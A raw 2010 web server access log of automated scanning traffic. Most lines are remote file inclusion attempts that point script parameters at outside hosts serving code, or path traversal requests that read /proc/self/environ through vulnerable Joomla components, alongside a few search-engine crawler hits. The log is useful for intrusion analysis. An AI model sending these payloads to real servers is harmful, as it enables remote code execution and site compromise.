74.55.135.18 - - [31/May/2010:21:07:14 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:14 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:14 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:17 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:17 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:17 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:17 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:17 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:18 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.195.112.180 - - [31/May/2010:21:07:25 -0500] "GET /logs/access_log.1187481600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.135.18 - - [31/May/2010:21:10:12 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:10:12 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:10:12 -0500] "GET /logs/access_log.1274572800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:10:13 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:10:13 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:10:14 -0500] "GET /logs/access_log.1274572800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
124.217.229.185 - - [31/May/2010:21:10:16 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.55.135.18 - - [31/May/2010:21:10:16 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:10:16 -0500] "GET /logs/access_log.1274572800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:10:16 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.217.229.185 - - [31/May/2010:21:10:16 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.195.241 - - [31/May/2010:21:10:28 -0500] "GET /logs/access_log.1251676800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [31/May/2010:21:14:08 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:14:09 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:16:05 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:16:06 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:16:08 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.7.185.19 - - [31/May/2010:21:17:19 -0500] "GET /logs/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
216.7.185.19 - - [31/May/2010:21:17:19 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
24.108.251.215 - - [31/May/2010:21:19:33 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.ca/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://achimelech-parthena.hostjournalbook.eu/10051913/vintage-tattoo-flash/&usg=__vDK5nz29V_eMINq5HUIneBoeuPU=&h=364&w=405&sz=67&hl=en&start=47&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Bflash%2Btattoo%2Bdesigns%26start%3D40%26um%3D1%26hl%3Den%26sa%3DN%26ndsp%3D20%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)"
24.108.251.215 - - [31/May/2010:21:19:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)"
209.126.254.3 - - [31/May/2010:21:22:34 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.126.254.3 - - [31/May/2010:21:22:34 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
74.14.231.236 - - [31/May/2010:21:22:48 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 287 "-""libwww-perl/5.805"
74.14.231.236 - - [31/May/2010:21:22:48 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 282 "-""libwww-perl/5.805"
200.61.185.200 - - [31/May/2010:21:22:55 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:23:22 -0500] "GET /logs//index.php?option=com_projectfork%A7ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:23:23 -0500] "GET //index.php?option=com_projectfork%A7ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
123.243.67.208 - - [31/May/2010:21:24:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
84.38.67.248 - - [31/May/2010:21:24:25 -0500] "GET /logs/access_log.1274313600/e107_handlers/secure_img_render.php?ifile=http://www.1a-werbeportal.de/buyer_aboutus/backup/bot-edit/idx? HTTP/1.1" 404 346 "-""libwww-perl/5.813"
84.38.67.248 - - [31/May/2010:21:24:25 -0500] "GET /e107_handlers/secure_img_render.php?ifile=http://www.1a-werbeportal.de/buyer_aboutus/backup/bot-edit/idx? HTTP/1.1" 404 319 "-""libwww-perl/5.813"
84.38.67.248 - - [31/May/2010:21:24:26 -0500] "GET /logs/e107_handlers/secure_img_render.php?ifile=http://www.1a-werbeportal.de/buyer_aboutus/backup/bot-edit/idx? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
200.61.185.200 - - [31/May/2010:21:25:54 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:25:55 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:26:03 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.12.58.212 - - [31/May/2010:21:27:25 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:21:27:25 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:27:36 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:27:37 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
123.243.67.208 - - [31/May/2010:21:28:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
174.121.58.89 - - [31/May/2010:21:31:17 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:21:31:17 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
84.40.30.37 - - [31/May/2010:21:31:17 -0500] "GET /?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:31:17 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:31:18 -0500] "GET /logs/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
76.12.58.212 - - [31/May/2010:21:31:38 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:21:31:38 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
84.40.30.37 - - [31/May/2010:21:31:53 -0500] "GET /?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:31:53 -0500] "GET /logs/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:31:53 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.61.185.200 - - [31/May/2010:21:31:56 -0500] "GET /logs/access_log.1274313600//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:31:58 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:31:58 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.12.58.212 - - [31/May/2010:21:32:12 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:32:16 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:32:16 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:32:26 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.102.1.206 - - [31/May/2010:21:33:35 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
123.243.67.208 - - [31/May/2010:21:33:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
76.12.58.212 - - [31/May/2010:21:34:57 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:21:34:57 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:35:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:35:02 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
200.61.185.200 - - [31/May/2010:21:35:33 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:35:39 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:21:38:07 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:21:38:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
76.12.58.212 - - [31/May/2010:21:38:12 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:21:38:12 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:21:38:12 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:39:10 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:39:10 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:39:10 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
87.250.255.243 - - [31/May/2010:21:40:58 -0500] "GET /logs/access_log.1231545600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
76.12.58.212 - - [31/May/2010:21:41:40 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:21:41:40 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:21:41:40 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.102.1.206 - - [31/May/2010:21:42:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:21:42:02 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:21:42:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.227.143.132 - - [31/May/2010:21:42:41 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:42:41 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:21:42:42 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
124.217.229.185 - - [31/May/2010:21:44:03 -0500] "GET /logs//index.php?option=com_projectfork%A7ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:44:03 -0500] "GET //index.php?option=com_projectfork%A7ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:44:40 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:44:41 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:21:46:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:21:46:23 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:21:46:24 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:46:40 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:46:41 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
84.40.30.37 - - [31/May/2010:21:47:08 -0500] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:47:08 -0500] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:47:09 -0500] "GET /logs/access_log.1273363200/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:47:15 -0500] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:47:15 -0500] "GET /logs/access_log.1273363200/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
84.40.30.37 - - [31/May/2010:21:47:18 -0500] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
200.61.185.200 - - [31/May/2010:21:49:10 -0500] "GET /logs/access_log.1274227200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:49:11 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:21:49:11 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.195.112.180 - - [31/May/2010:22:00:48 -0500] "GET /logs/access_log.1233014400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
187.45.193.159 - - [31/May/2010:22:01:41 -0500] "GET /logs//microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:22:01:42 -0500] "GET //microcms/micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.805"
72.37.150.18 - - [31/May/2010:22:01:44 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
72.37.150.18 - - [31/May/2010:22:01:44 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
72.37.150.18 - - [31/May/2010:22:01:44 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
66.249.27.162 - - [31/May/2010:22:04:44 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.65"
66.249.27.162 - - [31/May/2010:22:04:44 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.65"
80.249.169.14 - - [31/May/2010:22:05:18 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.836"
213.246.52.14 - - [31/May/2010:22:05:20 -0500] "POST /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.805"
